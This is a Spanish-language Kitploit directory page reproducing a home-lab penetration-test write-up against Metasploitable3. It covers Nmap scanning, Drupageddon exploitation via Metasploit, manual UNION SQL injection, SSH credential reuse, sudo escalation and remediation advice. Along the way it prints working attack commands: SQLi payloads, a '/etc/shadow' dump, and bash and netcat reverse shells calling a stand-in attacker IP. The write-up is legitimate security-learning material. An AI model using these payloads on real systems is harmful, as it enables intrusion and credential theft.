Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
metasploitable3-pentest-writeup — Informe de prueba de penetración de laboratorio doméstico de Metasploitable3 que cubre reconocimiento con Nmap, RCE de Drupalgeddon, inyección SQL, reutilización de credenciales SSH, escalada de privilegios con sudo y shells inversas. | Kitploit
Herramientas/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Escalada de PrivilegiosReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónCTFPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
Labs y Práctica
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Informe de prueba de penetración de laboratorio doméstico de Metasploitable3 que cubre reconocimiento con Nmap, RCE de Drupalgeddon, inyección SQL, reutilización de credenciales SSH, escalada de privilegios con sudo y shells inversas.

Ver Repositorio
1hace 19h 15mAún no revisado

Metasploitable3 — Informe de Prueba de Penetración

Autor: Arlen Fortunato
Fecha: Septiembre 2026
Entorno: Parrot OS (atacante) → Metasploitable3 Ubuntu 14.04 (objetivo)
Alcance: Prueba de penetración de red completa — enumeración, explotación, escalada de privilegios, post-explotación
Tipo: Home Lab / Práctica de Capture The Flag

⚠️ Todas las credenciales a continuación están censuradas. Este fue un ejercicio legal y aislado en un laboratorio doméstico.


Herramientas Utilizadas

HerramientaRol
NmapEscaneo de puertos, detección de servicio/versión, fingerprint de SO
Metasploit (msfconsole)Explotación (CVE-2014-3704), gestión de sesiones
msfvenomGeneración de payloads (reverse shells bash/netcat)
nc (netcat)Listener de reverse shell
curl / sedCreación manual de SQLi + formateo de salida HTML
ssh / scpAcceso remoto, validación de credenciales
openssl s_clientVerificación de servicio TLS/SSL
gobusterFuerza bruta de directorios (enumeración web)

Reconocimiento — Escaneo Completo de Puertos con Nmap

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

SO: Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


Resumen de Hallazgos


Detalles de los Hallazgos

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — Falso Positivo

Vulnerabilidad: UnrealIRCd 3.2.8.1 se distribuía históricamente con un binario troyanizado que ejecuta comandos arbitrarios cuando un cliente no autenticado envía una cadena de activación antes del registro — RCE como el usuario del demonio IRC.

Intento de explotación: Módulo de Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor con payloads cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. La verificación automática del módulo reportó el servicio como vulnerable; ninguna sesión devuelta con ningún payload.

Solución de problemas realizada:

  • Puerto accesible (nc -vz)
  • Puerto confirmado como IRC en texto plano, no TLS (openssl s_client)
  • Conexión inversa manual desde el objetivo confirmó que la red saliente funciona
  • Activación manual del backdoor mediante nc devolvió error de protocolo IRC 451 — el comando fue interpretado como comando IRC, nunca ejecutado

Conclusión: El banner de versión indica la compilación vulnerable, pero el backdoor está ausente en esta instancia (binario limpio/recompilado). Clasificado como no explotable — falso positivo, con evidencia.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Vulnerabilidad: Drupal 7.x anterior a 7.32 contiene una inyección SQL crítica en la capa de abstracción de base de datos que permite ejecución remota de código sin autenticación.

Confirmación de versión: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Explotación:

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Resultado:

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Enumeración post-explotación:

  • /var/www/html: chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home: 16 cuentas de usuario

3. Aplicación de Nóminas — Inyección SQL Basada en UNION (Manual)

Vulnerabilidad: Formulario de inicio de sesión de payroll_app.php, inyección SQL en el campo de contraseña. Sin automatización — creada mediante curl.

Paso 1 — Omisión de autenticación:

root@kitploit:~
' or 1=1#

' cierra la cadena SQL, or 1=1 fuerza verdadero, # comenta la comilla final.

Paso 2 — Conteo de columnas + mapeo de visualización:

root@kitploit:~
' UNION SELECT null, null, null, null#     -- sin error = 4 columnas
' UNION SELECT 1, 2, 3, 4#                 -- marcadores: 1=Username, 2=First, 3=Last, 4=Salary

Paso 3 — Enumeración de information_schema:

PreguntaRespuesta
Versión de BD / usuarioMySQL 5.5.62, root@localhost

Paso 4 — Volcado (contraseñas censuradas):

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — Credenciales por Defecto y Reutilización de Credenciales

Ruta 1 — Cuenta por defecto: el par de credenciales por defecto vagrant autenticado mediante SSH → usuario en el grupo sudo con (ALL : ALL) NOPASSWD: ALL.

Ruta 2 — Reutilización de credenciales: credenciales obtenidas del volcado SQLi autenticadas directamente mediante SSH como otro usuario del laboratorio (luke_skywalker, grupo sudo, (ALL : ALL) ALL).

Importancia: demuestra la reutilización de credenciales entre servicios — credenciales de aplicación mapeadas a una cuenta de sistema.


5. Escalada de Privilegios (Dos Rutas)

  • Ruta A: vagrant → sudo -l muestra NOPASSWD: ALL → sudo su - → uid=0(root).
  • Ruta B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

No se requirió exploit local — ambas cuentas poseen permisos sudo excesivamente permisivos.


6. Volcado de Shadow

root@kitploit:~
sudo cat /etc/shadow

Se extrajeron 16 hashes md5crypt ($1$) — recolección completa de credenciales tras la escalada de privilegios.


7. Post-Explotación — Reverse Shells

Payload 1 — bash:

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Capturado en nc -lnvp 4444 → shell interactiva.

Payload 2 — netcat (named-pipe):

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Capturado en nc -lnvp 4445 → shell interactiva.

Mecanismo: el named pipe (FIFO) conecta stdin/stdout de netcat a /bin/sh, formando un túnel bidireccional de un solo socket; el FIFO se elimina después.


Recomendaciones de Remediación


Descargo de Responsabilidad

Todas las pruebas se realizaron exclusivamente en un laboratorio doméstico aislado utilizando software intencionalmente vulnerable (Rapid7 Metasploitable3). No se comprometieron sistemas de producción ni objetivos no autorizados. Este informe es solo para fines educativos y desarrollo personal de habilidades.

Descargar herramienta
PuertoEstadoServicioVersión
21/tcpabiertoFTPProFTPD 1.3.5
22/tcpabiertoSSHOpenSSH 6.6.1p1
80/tcpabiertoHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpabiertoSMBSamba smbd 3.X–4.X
631/tcpabiertoIPPCUPS 1.7
3306/tcpabiertoMySQLMySQL (no autorizado)
3500/tcpabiertoHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpabiertoIRCUnrealIRCd
8080/tcpabiertoHTTPJetty 8.1.7.v20120910
#VulnerabilidadCVE / TipoPuertoSeveridadResultado
1Fingerprint de versión de UnrealIRCd — sondeo de backdoorCVE-2010-20756697⚠️ Falso positivoVerificación automática del módulo superada, sondeo manual fallido — backdoor ausente en la compilación
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 CríticaShell Meterpreter como www-data
3Aplicación de nóminas — SQLi UNION (manual)Inyección manual80🔴 CríticaVolcado completo de BD (15 usuarios, contraseñas en texto plano — censuradas)
4SSH — credenciales por defecto + reutilizadasPor defecto / reutilización de credenciales22🔴 Críticavagrant (sudo NOPASSWD), luke_skywalker (sudo ALL)
5Escalada de privilegios (dos rutas)sudo mal configuradoN/A🔴 Críticaroot mediante ambas cuentas
6Volcado de shadowPost-explotaciónN/A🔴 Crítica16 hashes md5crypt extraídos
7Reverse shells (bash + netcat)msfvenom / creación manual4444/4445🟠 AltaShells interactivas capturadas en el listener del atacante
Bases de datosinformation_schema, drupal, mysql, payroll, performance_schema
Tablas en payrollusers
Columnas en usersusername, first_name, last_name, password, salary
UsuarioContraseñaSalario
leia_organa[CENSURADO]9560
luke_skywalker[CENSURADO]1080
han_solo[CENSURADO]1200
artoo_detoo[CENSURADO]22222
boba_fett[CENSURADO]20000
greedo[CENSURADO]50000
(+ 9 cuentas más)[CENSURADO]—
HallazgoRecomendación
Fingerprint de versión de UnrealIRCdVerificar la integridad del origen del binario (checksums); actualizar o eliminar
Drupal 7.5Actualizar a la última versión estable; aplicar SA-CORE-2014-005
SQLi en nóminasConsultas parametrizadas / sentencias preparadas; validar la entrada
Credenciales SSH por defectoRotar/eliminar cuentas por defecto; forzar autenticación basada en claves
Sudo con privilegios excesivosAplicar el principio de mínimo privilegio; eliminar concesiones NOPASSWD generales
Reutilización de credencialesForzar contraseñas únicas por servicio; política de contraseñas
Hashing de contraseñas débilMigrar md5crypt → bcrypt / Argon2id